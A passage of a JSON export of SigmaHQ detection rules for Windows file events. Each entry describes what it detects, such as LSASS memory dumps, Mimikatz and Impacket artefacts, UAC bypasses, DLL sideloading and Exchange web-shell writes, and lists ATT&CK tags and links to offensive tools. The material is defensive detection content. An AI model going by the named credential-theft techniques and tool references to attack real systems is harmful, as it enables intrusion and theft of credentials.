(OTR), wagga", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_dcom_iertutil_dll_hijack.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "value": "Potential DCOM InternetExplorer.Application DLL Hijack" }, { "description": "Detects javaw.exe in the AppData folder as used by Adwind / JRAT", "meta": { "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "creation_date": "2017-11-10", "falsepositive": [ "No established falsepositives" ], "filename": "file_event_win_mal_adwind.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { 
"dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "value": "Adwind RAT / JRAT File Artifact" }, { "description": "Detects the creation of log files during a TeamViewer remote session", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-30", "falsepositive": [ "Legitimate uses of TeamViewer in an organisation" ], "filename": "file_event_win_susp_teamviewer_remote_session.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.teamviewer.com/en-us/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", "value": "TeamViewer Remote Session" }, { "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Teams applications are installed.\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (\"iphlpapi.dll\") is sideloaded.\n", "meta": { "author": "frack113", "creation_date": "2022-08-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_iphlpapi_dll_sideloading.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": 
"e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder" }, { "description": "Detects the presence of Unicode characters which are homoglyphs of, or identical in appearance to, ASCII letter characters.\nThis is used as an obfuscation and masquerading technique. Only \"perfect\" homoglyphs are included; these are characters that\nare indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.\n", "meta": { "author": "Micah Babinski, @micahbabinski", "creation_date": "2023-05-08", "falsepositive": [ "File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use." ], "filename": "file_event_win_susp_homoglyph_filename.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "http://www.irongeek.com/homoglyph-attack-generator.php", "https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_homoglyph_filename.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f1707b1-b50b-45b4-b5a2-3978b5a5d0d6", "value": "Potential Homoglyph Attack Using Lookalike Characters in Filename" }, { "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could contain LSASS process memory, which 
contains user credentials", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-27", "falsepositive": [ "Unknown" ], "filename": "file_event_win_lsass_werfault_dump.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/helpsystems/nanodump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "value": "WerFault LSASS Process Memory Dump" }, { "description": "Detects programs on a Windows system that should not write executables to disk", "meta": { "author": "frack113, Florian Roth (Nextron Systems)", "creation_date": "2022-08-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_legitimate_app_dropping_exe.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f0540f7e-2db3-4432-b9e0-3965486744bc", "value": "Legitimate Application Dropped Executable" }, { "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database) by an uncommon process or a process located in a suspicious directory", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine 
Bencherchali (Nextron Systems)", "creation_date": "2022-01-11", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ntds_dit_uncommon_process.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2398", "https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "11b1ed55-154d-4e82-8ad7-83739298f720", "value": "NTDS.DIT Creation By Uncommon Process" }, { "description": "Adversaries may interact with a remote network share using Server Message Block (SMB), for example by writing command output to a local admin share.\nThis technique is used by post-exploitation frameworks.\n", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "file_event_win_writing_local_admin_share.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "value": "Writing Local Admin Share" }, { "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .aspx files to disk, which could be a sign of ProxyShell exploitation and web shell deployment", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-25", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_exchange_aspx_write.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/blackbyte-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml" ], "tags": [ "attack.initial-access", "attack.t1190", "attack.persistence", "attack.t1505.003" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", "value": "Suspicious MSExchangeMailboxReplication ASPX Write" }, { "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).\nIt is highly recommended to perform an initial baseline before using this rule in production.\n", "meta": { "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-05-26", "falsepositive": [ "System processes copied outside their default folders for testing purposes", "Third party software naming their software with the same names as the processes mentioned here" ], "filename": "file_event_win_creation_system_file.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "value": "Files With System Process Name In Unsuspected Locations" }, { "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", "meta": { "author": "SecurityAura", "creation_date": "2022-11-16", "falsepositive": [ "Unknown" ], "filename": "file_event_win_hktl_remote_cred_dump.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://github.com/Porchetta-Industries/CrackMapExec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", "value": "HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump" }, { "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_ieinstal.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "value": "UAC Bypass Using IEInstal - File" }, { "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Legitimate usage of \".pub\" files from those locations" ], "filename": "file_event_win_office_publisher_files_in_susp_locations.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/EmericNasi/status/1623224526220804098", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", "value": "Publisher Attachment File Dropped In Suspicious Location" }, { "description": "Detects PowerShell creating a binary executable or a script file.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-17", "falsepositive": [ "False positives will differ depending on the environment and scripts used. Apply additional filters accordingly." 
], "filename": "file_event_win_powershell_drop_binary_or_script.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_drop_binary_or_script.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "7047d730-036f-4f40-b9d8-1c63e36d5e62", "value": "Potential Binary Or Script Dropper Via PowerShell" }, { "description": "Detects Windows shells and scripting applications that write files to suspicious folders", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-20", "falsepositive": [ "Unknown" ], "filename": "file_event_win_shell_write_susp_directory.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", "value": "Windows Shell/Scripting Application File Write to Suspicious Folder" }, { "description": "Detects the creation of a file with an uncommon extension in an Office application startup folder", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-05", "falsepositive": [ "False positive might stem from rare extensions used by other Office utilities." 
], "filename": "file_event_win_office_uncommon_file_startup.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", "http://addbalance.com/word/startup.htm", "https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions", "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "value": "Uncommon File Created In Office Startup Folder" }, { "description": "Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.\n", "meta": { "author": "Nounou Mbeiri, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-26", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/", "https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.Common/Data/DPAPI/DPAPIBackupKey.cs#L28-L32", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml" ], "tags": [ "attack.t1555", "attack.t1552.004" ] }, "related": [ { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7892ec59-c5bb-496d-8968-e5d210ca3ac4", "value": "DPAPI Backup Keys And Certificate Export Activity IOC" }, { "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", "meta": { "author": "Florian Roth (Nextron Systems), David ANDRE", "creation_date": "2021-11-08", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_hktl_mimikatz_files.yml", "level": "critical", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://cobalt.io/blog/kerberoast-attack-techniques", "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml" ], "tags": [ "attack.credential-access", "attack.t1558" ] }, "related": [ { "dest-uuid": "3fc01293-ef5e-41c6-86ce-61f10706b64a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29", "value": "HackTool - Mimikatz Kirbi File Creation" }, { "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". 
This could indicate possible persistence", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-10", "falsepositive": [ "Possible FPs during first installation of Notepad++", "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" ], "filename": "file_event_win_notepad_plus_plus_persistence.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", "value": "Potential Persistence Via Notepad++ Plugins" }, { "description": "Detects the creation of known offensive PowerShell scripts used for exploitation", "meta": { "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "creation_date": "2018-04-07", "falsepositive": [ "Unknown" ], "filename": "file_event_win_powershell_exploit_scripts.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20210511204621/https://github.com/AlsidOfficial/WSUSpendu", "https://github.com/CsEnox/EventViewer-UACBypass", "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", "https://github.com/NetSPI/PowerUpSQL", "https://github.com/DarkCoderSc/PowerRunAsSystem/", "https://github.com/samratashok/nishang", "https://github.com/adrecon/AzureADRecon", "https://github.com/nettitude/Invoke-PowerThIEf", "https://github.com/S3cur3Th1sSh1t/WinPwn", "https://github.com/HarmJ0y/DAMP", 
"https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", "https://github.com/PowerShellMafia/PowerSploit", "https://github.com/Kevin-Robertson/Powermad", "https://github.com/adrecon/ADRecon", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", "https://github.com/besimorhino/powercat", "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", "value": "Malicious PowerShell Scripts - FileCreation" }, { "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", "meta": { "author": "frack113", "creation_date": "2022-01-09", "falsepositive": [ "Unknown" ], "filename": "file_event_win_csharp_compile_artefact.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.004" ] }, "related": [ { "dest-uuid": 
"c726e0a2-a57a-4b7b-a973-d0f013246617", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", "value": "Dynamic CSharp Compile Artefact" }, { "description": "Detects the creation of an \"lsass.dmp\" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-10-19", "falsepositive": [ "Rare case of troubleshooting by an administrator or support that has to be investigated regardless" ], "filename": "file_event_win_taskmgr_lsass_dump.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69ca12af-119d-44ed-b50f-a47af0ebc364", "value": "LSASS Process Memory Dump Creation Via Taskmgr.EXE" }, { "description": "Detects creation of the PsExec key file, which is created any time a PsExec command is executed. 
It gets written to the file system and will be recorded in the USN Journal on the target system", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-21", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_sysinternals_psexec_service_key.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://aboutdfir.com/the-key-to-identify-psexec/", "https://twitter.com/davisrichardg/status/1616518800584704028", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_psexec_service_key.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.execution", "attack.persistence", "attack.t1136.002", "attack.t1543.003", "attack.t1570", "attack.s0029" ] }, "related": [ { "dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "value": "PSEXEC Remote Execution File Artefact" }, { "description": "Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-15", "falsepositive": [ "Unknown" ], "filename": "file_event_win_lsass_default_dump_file_names.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", "https://github.com/helpsystems/nanodump", 
"https://www.google.com/search?q=procdump+lsass", "https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", "https://github.com/CCob/MirrorDump", "https://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35", "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", "value": "LSASS Process Memory Dump Files" }, { "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "value": "UAC Bypass Using NTFS Reparse Point - File" }, { "description": "Detects the creation of tasks from processes executed 
from suspicious locations", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-11-16", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_task_write.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_task_write.yml" ], "tags": [ "attack.persistence", "attack.execution", "attack.t1053" ] }, "related": [ { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "80e1f67a-4596-4351-98f5-a9c3efabac95", "value": "Suspicious Scheduled Task Write to System32 Tasks" }, { "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-11", "falsepositive": [ "Cases in which a user mounts an image file for legitimate reasons" ], "filename": "file_event_win_iso_file_recent.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { 
